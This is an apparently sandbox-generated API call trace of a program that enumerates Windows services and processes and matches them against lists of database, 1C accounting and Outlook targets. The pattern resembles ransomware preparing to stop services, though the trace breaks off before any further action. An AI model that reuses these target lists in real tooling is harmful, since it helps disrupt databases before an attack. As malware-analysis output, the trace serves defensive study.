	[0051.535] EnumServicesStatusExW (in: hSCManager=0x7e0fba8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4b70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4b70c0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0051.536] CloseServiceHandle (hSCObject=0x7e0fba8) returned 1
	[0051.536] lstrlenW (lpString="Appinfo") returned 7
	[0051.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0051.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0051.536] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0051.536] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0051.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0051.536] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0051.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0051.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0051.536] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0051.536] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0051.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0051.536] lstrlenW (lpString="AudioSrv") returned 8
	[0051.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0051.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0051.536] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0051.537] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0051.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0051.537] lstrlenW (lpString="BFE") returned 3
	[0051.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0051.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0051.537] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0051.537] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0051.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0051.537] lstrlenW (lpString="CryptSvc") returned 8
	[0051.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0051.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0051.537] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0051.537] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0051.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0051.537] lstrlenW (lpString="CscService") returned 10
	[0051.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0051.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0051.537] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0051.537] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0051.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0051.537] lstrlenW (lpString="DcomLaunch") returned 10
	[0051.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0051.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0051.537] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0051.537] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0051.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0051.537] lstrlenW (lpString="Dhcp") returned 4
	[0051.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0051.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0051.537] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0051.537] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0051.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0051.537] lstrlenW (lpString="Dnscache") returned 8
	[0051.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0051.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0051.538] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0051.538] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0051.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0051.538] lstrlenW (lpString="DPS") returned 3
	[0051.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0051.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0051.538] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0051.538] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0051.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0051.538] lstrlenW (lpString="eventlog") returned 8
	[0051.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0051.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0051.538] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0051.538] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0051.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0051.538] lstrlenW (lpString="EventSystem") returned 11
	[0051.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0051.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0051.538] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0051.538] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0051.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0051.538] lstrlenW (lpString="gpsvc") returned 5
	[0051.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0051.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0051.538] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0051.538] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0051.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0051.538] lstrlenW (lpString="iphlpsvc") returned 8
	[0051.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0051.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0051.538] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0051.538] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0051.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0051.538] lstrlenW (lpString="LanmanServer") returned 12
	[0051.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0051.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0051.539] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0051.539] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0051.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0051.539] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0051.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0051.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0051.539] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0051.539] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0051.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0051.539] lstrlenW (lpString="lmhosts") returned 7
	[0051.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0051.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0051.539] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0051.539] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0051.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0051.539] lstrlenW (lpString="MMCSS") returned 5
	[0051.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0051.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0051.539] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0051.539] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0051.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0051.539] lstrlenW (lpString="MpsSvc") returned 6
	[0051.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0051.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0051.539] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0051.539] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0051.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0051.539] lstrlenW (lpString="Netman") returned 6
	[0051.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0051.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0051.539] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0051.539] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0051.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0051.540] lstrlenW (lpString="netprofm") returned 8
	[0051.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0051.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0051.540] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0051.540] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0051.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0051.540] lstrlenW (lpString="NlaSvc") returned 6
	[0051.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0051.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0051.540] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0051.540] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0051.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0051.540] lstrlenW (lpString="nsi") returned 3
	[0051.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0051.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0051.540] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0051.540] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0051.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0051.540] lstrlenW (lpString="PcaSvc") returned 6
	[0051.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0051.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0051.540] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0051.540] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0051.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0051.540] lstrlenW (lpString="PlugPlay") returned 8
	[0051.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0051.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0051.540] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0051.540] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0051.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0051.540] lstrlenW (lpString="Power") returned 5
	[0051.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0051.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0051.540] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0051.540] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0051.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0051.541] lstrlenW (lpString="ProfSvc") returned 7
	[0051.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0051.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0051.541] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0051.541] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0051.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0051.541] lstrlenW (lpString="RpcEptMapper") returned 12
	[0051.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0051.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0051.541] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0051.541] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0051.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0051.541] lstrlenW (lpString="RpcSs") returned 5
	[0051.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0051.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0051.541] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0051.541] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0051.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0051.541] lstrlenW (lpString="SamSs") returned 5
	[0051.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0051.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0051.541] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0051.541] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0051.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0051.541] lstrlenW (lpString="Schedule") returned 8
	[0051.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0051.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0051.541] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0051.541] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0051.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0051.541] lstrlenW (lpString="SENS") returned 4
	[0051.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0051.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0051.541] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0051.542] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0051.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0051.542] lstrlenW (lpString="ShellHWDetection") returned 16
	[0051.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0051.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0051.542] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0051.542] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0051.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0051.542] lstrlenW (lpString="Spooler") returned 7
	[0051.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0051.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0051.542] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0051.542] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0051.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0051.542] lstrlenW (lpString="swprv") returned 5
	[0051.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0051.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0051.542] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0051.542] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0051.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0051.542] lstrlenW (lpString="SysMain") returned 7
	[0051.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0051.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0051.542] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0051.542] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0051.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0051.542] lstrlenW (lpString="Themes") returned 6
	[0051.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0051.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0051.542] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0051.542] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0051.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0051.542] lstrlenW (lpString="TrkWks") returned 6
	[0051.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0051.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0051.542] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0051.543] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0051.543] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0051.543] lstrlenW (lpString="UxSms") returned 5
	[0051.543] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0051.543] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0051.543] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0051.543] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0051.543] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0051.543] lstrlenW (lpString="VSS") returned 3
	[0051.543] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0051.543] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0051.543] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0051.543] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0051.543] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0051.543] lstrlenW (lpString="WdiServiceHost") returned 14
	[0051.543] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0051.543] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0051.543] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0051.543] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0051.543] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0051.543] lstrlenW (lpString="WdiSystemHost") returned 13
	[0051.543] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0051.543] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0051.543] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0051.543] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0051.543] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0051.543] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0051.543] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0051.543] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0051.543] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0051.543] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0051.543] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0051.543] lstrlenW (lpString="Winmgmt") returned 7
	[0051.543] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0051.544] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0051.544] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0051.544] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0051.544] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0051.544] lstrlenW (lpString="WPDBusEnum") returned 10
	[0051.544] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0051.544] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0051.544] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0051.544] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0051.544] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0051.544] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4b70c0 | out: hHeap=0x7d60000) returned 1
	[0051.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0051.546] Process32FirstW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0051.546] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0051.547] lstrlenW (lpString="System") returned 6
	[0051.547] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0051.547] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0051.547] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0051.547] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0051.547] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0051.547] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0051.547] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0051.547] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0051.547] lstrlenW (lpString="smss.exe") returned 8
	[0051.547] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0051.547] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0051.547] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0051.548] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0051.548] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0051.548] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0051.548] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0051.548] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0051.548] lstrlenW (lpString="csrss.exe") returned 9
	[0051.548] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0051.548] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0051.548] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0051.548] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0051.548] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0051.548] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0051.548] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0051.548] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0051.549] lstrlenW (lpString="wininit.exe") returned 11
	[0051.549] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0051.549] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0051.549] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0051.549] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0051.549] lstrlenW (lpString="csrss.exe") returned 9
